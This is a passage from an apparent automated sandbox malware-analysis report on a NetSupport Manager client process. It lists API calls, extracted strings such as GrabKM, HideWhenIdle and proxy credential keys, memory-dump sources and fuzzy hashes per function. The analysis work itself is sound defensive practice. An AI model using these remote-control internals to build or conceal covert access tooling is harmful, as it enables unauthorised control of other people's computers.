                                                                                      • ExpandEnvironmentStringsA.KERNEL32(?,?,00000100,?,?,?,?,?,?,00000000), ref: 11074BCF
                                                                                      • CreateThread.KERNEL32(00000000,00004000,11070C60,00000000,00000000,?), ref: 11074C6C
                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 11074C73
                                                                                      • SetTimer.USER32(00000000,00000000,000000FA,11063680), ref: 11074CB7
                                                                                      • std::exception::exception.LIBCMT ref: 11074D68
                                                                                      • __CxxThrowException@8.LIBCMT ref: 11074D83
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CriticalInitializeSection$CloseCreateEnvironmentException@8ExpandHandleStringsThreadThrowTimer_malloc_memset_strncpystd::exception::exceptionwsprintf
                                                                                      • String ID: ..\ctl32\Connect.cpp$DefaultUsername$General$Password$RememberPassword$destroy_queue == NULL
                                                                                      • API String ID: 703120326-1497550179
                                                                                      • Opcode ID: 7c8943816f378bc6fd854347406ceee894156ad89ebdfca9a8c75f1e5f5be459
                                                                                      • Instruction ID: 2d3153b5a6430d98d64e81d2a1e668bfe4de0d121a1dff3557e595bbadcf65c6
                                                                                      • Opcode Fuzzy Hash: 7c8943816f378bc6fd854347406ceee894156ad89ebdfca9a8c75f1e5f5be459
                                                                                      • Instruction Fuzzy Hash: 79B1A4B5A00359AFD710CF64CD84FDAF7F4BB48708F0085A9E65997281EBB0B944CB65
                                                                                      Function 11108D30 Relevance: 33.5, APIs: 14, Strings: 5, Instructions: 213libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                        • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                        • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                      • OpenEventA.KERNEL32(00000002,00000000,nsm_gina_sas,00000009), ref: 11108E0A
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 11108E19
                                                                                      • GetSystemDirectoryA.KERNEL32(?,000000F7), ref: 11108E2B
                                                                                      • LoadLibraryA.KERNEL32(?), ref: 11108E61
                                                                                      • GetProcAddress.KERNEL32(?,GrabKM), ref: 11108E8E
                                                                                      • GetProcAddress.KERNEL32(?,LoggedOn), ref: 11108EA6
                                                                                      • FreeLibrary.KERNEL32(?), ref: 11108ECB
                                                                                        • Part of subcall function 1110F2B0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,76EEC3F0,00000000,?,11110245,1110FDE0,00000001,00000000), ref: 1110F2C7
                                                                                        • Part of subcall function 1110F2B0: CreateThread.KERNEL32(00000000,11110245,00000001,00000000,00000000,0000000C), ref: 1110F2EA
                                                                                        • Part of subcall function 1110F2B0: WaitForSingleObject.KERNEL32(?,000000FF,?,11110245,1110FDE0,00000001,00000000,?,?,?,?,?,11031040), ref: 1110F317
                                                                                        • Part of subcall function 1110F2B0: CloseHandle.KERNEL32(?,?,11110245,1110FDE0,00000001,00000000,?,?,?,?,?,11031040), ref: 1110F321
                                                                                      • GetStockObject.GDI32(0000000D), ref: 11108EDF
                                                                                      • GetObjectA.GDI32(00000000,0000003C,?), ref: 11108EEF
                                                                                      • InitializeCriticalSection.KERNEL32(0000003C), ref: 11108F0B
                                                                                      • InitializeCriticalSection.KERNEL32(111F060C), ref: 11108F16
                                                                                        • Part of subcall function 11107290: LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,00000000,11189A56,000000FF), ref: 11107363
                                                                                        • Part of subcall function 11107290: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 111073B2
                                                                                      • CloseHandle.KERNEL32(00000000,Function_00102C50,00000001,00000000), ref: 11108F59
                                                                                        • Part of subcall function 1109E9E0: GetCurrentProcess.KERNEL32(00020008,00000000,?,?,110F7D14,00000001,111417B8,_debug,TraceCopyData,00000000,00000000,?,?,00000000,00000000), ref: 1109EA01
                                                                                        • Part of subcall function 1109E9E0: OpenProcessToken.ADVAPI32(00000000,?,?,110F7D14,00000001,111417B8,_debug,TraceCopyData,00000000,00000000,?,?,00000000,00000000), ref: 1109EA08
                                                                                        • Part of subcall function 1109E9E0: CloseHandle.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1109EA27
                                                                                      • CloseHandle.KERNEL32(00000000,Function_00102C50,00000001,00000000), ref: 11108FAA
                                                                                      • CloseHandle.KERNEL32(00000000,Function_00102C50,00000001,00000000), ref: 11108FFF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CloseHandle$Library$LoadObject$AddressCreateCriticalEventInitializeOpenProcProcessSection$CurrentDirectoryFreeSingleStockSystemThreadTokenWait_malloc_memsetwsprintf
                                                                                      • String ID: GrabKM$LPT1$LoggedOn$\pcigina$nsm_gina_sas
                                                                                      • API String ID: 3930710499-403456261
                                                                                      • Opcode ID: 1bb63630e84e06d7a5d883501c08249baca6a639cf459e52fb6089e18ee58e4a
                                                                                      • Instruction ID: 229803012459fbbe5cfd3a30b02a894d1af5bad55287ed163187595495ff030c
                                                                                      • Opcode Fuzzy Hash: 1bb63630e84e06d7a5d883501c08249baca6a639cf459e52fb6089e18ee58e4a
                                                                                      • Instruction Fuzzy Hash: DC81AFB4E0435AEFEB55DFB48C89B9AFBE9AB48308F00457DE569D7280E7309944CB11
                                                                                      Function 11138C30 Relevance: 31.8, APIs: 12, Strings: 6, Instructions: 348windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 111450A0: GetVersionExA.KERNEL32(111F0EF0,75BF8400), ref: 111450D0
                                                                                        • Part of subcall function 111450A0: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114510F
                                                                                        • Part of subcall function 111450A0: _memset.LIBCMT ref: 1114512D
                                                                                        • Part of subcall function 111450A0: _strncpy.LIBCMT ref: 111451FA
                                                                                      • PostMessageA.USER32(00030496,000006CF,00000007,00000000), ref: 11138E0F
                                                                                        • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                      • SetWindowTextA.USER32(00030496,00000000), ref: 11138EB7
                                                                                      • IsWindowVisible.USER32(00030496), ref: 11138F7C
                                                                                      • GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,00000000), ref: 11138F9C
                                                                                      • IsWindowVisible.USER32(00030496), ref: 11138FAA
                                                                                      • SetForegroundWindow.USER32(00000000), ref: 11138FD8
                                                                                      • EnableWindow.USER32(00030496,00000001), ref: 11138FE7
                                                                                      • IsWindowVisible.USER32(00030496), ref: 11139038
                                                                                      • IsWindowVisible.USER32(00030496), ref: 11139045
                                                                                      • EnableWindow.USER32(00030496,00000000), ref: 11139059
                                                                                      • EnableWindow.USER32(00030496,00000000), ref: 11138FBF
                                                                                        • Part of subcall function 11131210: ShowWindow.USER32(00030496,00000000,?,11139062,00000007,?,?,?,?,?,00000000), ref: 11131234
                                                                                      • EnableWindow.USER32(00030496,00000001), ref: 1113906D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Window$EnableVisible$Foreground$MessageOpenPostShowTextVersion__wcstoi64_memset_strncpy
                                                                                      • String ID: Client$ConnectedText$HideWhenIdle$LockedText$ShowUIOnConnect$ViewedText
                                                                                      • API String ID: 3453649892-3803836183
                                                                                      • Opcode ID: 391fd03a16533da79435ce5bee1303fc2e717428408a6b437c143b59ca9afbf1
                                                                                      • Instruction ID: ae8ec3c714d324370739ddb1cab1952d607c59122f5be0bb7ac7fd02d25128b2
                                                                                      • Opcode Fuzzy Hash: 391fd03a16533da79435ce5bee1303fc2e717428408a6b437c143b59ca9afbf1
                                                                                      • Instruction Fuzzy Hash: 86C12A75A1122A9BEB11DFF4CD80B6EF769ABC072DF140138EA159B28CEB75E804C751
                                                                                      Function 6C5E33A0 Relevance: 29.1, APIs: 2, Strings: 17, Instructions: 571COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4163444203.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4163419396.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163492259.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163517187.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163540005.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163540005.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163584177.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6c5d0000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: wsprintf
                                                                                      • String ID: %s:%s$*GatewayAddress$*PINServer$*UseWebProxy$*WebProxy$:%d$Gateway$Gateway_UseWebProxy$Gateway_WebProxy$P$PinProxy$ProxyCred$ProxyPassword$ProxyUsername$UsePinProxy$client247$r<^l
                                                                                      • API String ID: 2111968516-2245968893
                                                                                      • Opcode ID: a4e93b3c8ccc3a6b7aca88ff6a4ce5e76e438b27463c39e0fb5cbacf9f3d350e
                                                                                      • Instruction ID: 7efd35a4ae0c02fe8056c906006a5b9779c271741d730474cfeafd88f3de7ded
                                                                                      • Opcode Fuzzy Hash: a4e93b3c8ccc3a6b7aca88ff6a4ce5e76e438b27463c39e0fb5cbacf9f3d350e
                                                                                      • Instruction Fuzzy Hash: AD2288B2A04368ABDB24DF68CC80EEAB7B9EB49304F0485D9E54967A40D7315FC8CF51
                                                                                      Function 110281A0 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 130librarysynchronizationCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000102,NSM.LIC,00000009), ref: 110281F1
                                                                                        • Part of subcall function 11081B40: _strrchr.LIBCMT ref: 11081B4E
                                                                                      • wsprintfA.USER32 ref: 11028214
                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 11028259
                                                                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 1102826D
                                                                                      • wsprintfA.USER32 ref: 11028291
                                                                                      • CloseHandle.KERNEL32(?), ref: 110282A7
                                                                                      • CloseHandle.KERNEL32(?), ref: 110282B0
                                                                                      • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,?,?,?,NSM.LIC,00000009), ref: 11028311
                                                                                      • GetModuleHandleA.KERNEL32(00000000,00000000,?,?,?,?,?,NSM.LIC,00000009), ref: 11028325
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Handle$CloseModulewsprintf$CodeExitFileLibraryLoadNameObjectProcessSingleWait_strrchr
                                                                                      • String ID: "$Locales\%d\$NSM.LIC$SetClientResLang called, gPlatform %x$Setting resource langid=%d$\GetUserLang.exe"$pcicl32_res.dll
                                                                                      • API String ID: 512045693-419896573
                                                                                      • Opcode ID: be2a4d539e06a764388bcf1fddbdd407ba59922a3a30c161602edf8e7ebb4000
                                                                                      • Instruction ID: 7a246749baaa4a6e23861a3fd22e5cd13303056935123195fcb9bb693944541c
                                                                                      • Opcode Fuzzy Hash: be2a4d539e06a764388bcf1fddbdd407ba59922a3a30c161602edf8e7ebb4000
                                                                                      • Instruction Fuzzy Hash: B841D678E04229ABD714CF65CCD5FEAB7B9EB44709F0081A5F95897280DA71AE44CBA0
                                                                                      Function 11085E10 Relevance: 26.5, APIs: 8, Strings: 7, Instructions: 218libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadLibraryA.KERNEL32(PCIINV.DLL,A1BC2D8B,02A87CE8,02A87CD8,?,00000000,1118276C,000000FF,?,11031942,02A87CE8,00000000,?,?,?), ref: 11085E45
                                                                                        • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                        • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                        • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                        • Part of subcall function 1110F520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76EEC3F0,?,1111022D,00000000,00000001,?,?,?,?,?,11031040), ref: 1110F53E
                                                                                      • GetProcAddress.KERNEL32(00000000,GetInventory), ref: 11085E6B
                                                                                      • GetProcAddress.KERNEL32(00000000,Cancel), ref: 11085E7F
                                                                                      • GetProcAddress.KERNEL32(00000000,GetInventoryEx), ref: 11085E93
                                                                                      • wsprintfA.USER32 ref: 11085F1B
                                                                                      • wsprintfA.USER32 ref: 11085F32
                                                                                      • wsprintfA.USER32 ref: 11085F49
                                                                                      • CloseHandle.KERNEL32(00000000,11085C70,00000001,00000000), ref: 1108609A
                                                                                        • Part of subcall function 11085A80: CloseHandle.KERNEL32(?,74DEF550,?,?,110860C0,?,11031942,02A87CE8,00000000,?,?,?), ref: 11085A98
                                                                                        • Part of subcall function 11085A80: CloseHandle.KERNEL32(?,74DEF550,?,?,110860C0,?,11031942,02A87CE8,00000000,?,?,?), ref: 11085AAB
                                                                                        • Part of subcall function 11085A80: CloseHandle.KERNEL32(?,74DEF550,?,?,110860C0,?,11031942,02A87CE8,00000000,?,?,?), ref: 11085ABE
                                                                                        • Part of subcall function 11085A80: FreeLibrary.KERNEL32(00000000,74DEF550,?,?,110860C0,?,11031942,02A87CE8,00000000,?,?,?), ref: 11085AD1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CloseHandlewsprintf$AddressProc$Library$CreateEventFreeLoad_malloc_memset
                                                                                      • String ID: %s_HF.%s$%s_HW.%s$%s_SW.%s$Cancel$GetInventory$GetInventoryEx$PCIINV.DLL
                                                                                      • API String ID: 4263811268-2492245516
                                                                                      • Opcode ID: f5aef0daa14bc6ea66726438fc532167d4c8a127bd90decb683372eff0d319c6
                                                                                      • Instruction ID: c264ff3baa83c9e34b1ea5f373b83d9ca187d225ad452563e08076ac2ec7b834
                                                                                      • Opcode Fuzzy Hash: f5aef0daa14bc6ea66726438fc532167d4c8a127bd90decb683372eff0d319c6
                                                                                      • Instruction Fuzzy Hash: 40718175E0874AABEB14CF75CC46BDBFBE4AB48304F10452AE956D7280EB71A500CB95
                                                                                      Function 110304B8 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 190synchronizationlibraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • OpenMutexA.KERNEL32(001F0001,00000000,PCIMutex), ref: 110305F3
                                                                                      • CreateMutexA.KERNEL32(00000000,00000000,PCIMutex), ref: 1103060A
                                                                                      • GetProcAddress.KERNEL32(?,SetProcessDPIAware), ref: 110306AC
                                                                                      • SetLastError.KERNEL32(00000078), ref: 110306C2
                                                                                      • WaitForSingleObject.KERNEL32(?,000001F4), ref: 110306FC
                                                                                      • CloseHandle.KERNEL32(?), ref: 11030709
                                                                                      • FreeLibrary.KERNEL32(?), ref: 11030714
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 1103071B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CloseHandleMutex$AddressCreateErrorFreeLastLibraryObjectOpenProcSingleWait
                                                                                      • String ID: /247$PCIMutex$SOFTWARE\Policies\NetSupport\Client\standard$SetProcessDPIAware$_debug\trace$_debug\tracefile$istaUI
                                                                                      • API String ID: 2061479752-1320826866
                                                                                      • Opcode ID: 344344da4f24c17c6c11c64113ed1526ed618b4690303f5ba055bceda43c688d
                                                                                      • Instruction ID: 4511418fabb8e143c6e2e60e2068ec6a59f08b67eb8208c825473cc9362a61df
                                                                                      • Opcode Fuzzy Hash: 344344da4f24c17c6c11c64113ed1526ed618b4690303f5ba055bceda43c688d
                                                                                      • Instruction Fuzzy Hash: 72613774E1635AAFEB10DFB09C44B9EB7B4AF8470DF1000A9D919A71C5EF70AA44CB51
                                                                                      Function 11106100 Relevance: 24.7, APIs: 9, Strings: 5, Instructions: 153COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetTickCount.KERNEL32 ref: 1110612E
                                                                                      • EnterCriticalSection.KERNEL32(111F060C), ref: 11106137
                                                                                      • GetTickCount.KERNEL32 ref: 1110613D
                                                                                      • GetTickCount.KERNEL32 ref: 11106190
                                                                                      • LeaveCriticalSection.KERNEL32(111F060C), ref: 11106199
                                                                                      • GetTickCount.KERNEL32 ref: 111061CA
                                                                                      • LeaveCriticalSection.KERNEL32(111F060C), ref: 111061D3
                                                                                      • EnterCriticalSection.KERNEL32(111F060C), ref: 111061FC
                                                                                      • LeaveCriticalSection.KERNEL32(111F060C,00000000,?,00000000), ref: 111062C3
                                                                                        • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                        • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                        • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                        • Part of subcall function 110F0CF0: InitializeCriticalSection.KERNEL32(00000038,00000000,00000000,?,00000000,?,11106267,?), ref: 110F0D1B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$CountTick$Leave$Enter$Initialize_malloc_memsetwsprintf
                                                                                      • String ID: Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock$e:\nsmsrc\nsm\1210\1210f\client32\platnt.cpp$info. new psi(%d) = %x$psi
                                                                                      • API String ID: 1574099134-3013461081
                                                                                      • Opcode ID: e4cf314df931be329bed10d82e2fbe7145bba63e1bcfccc88a3091ef951cf9c4
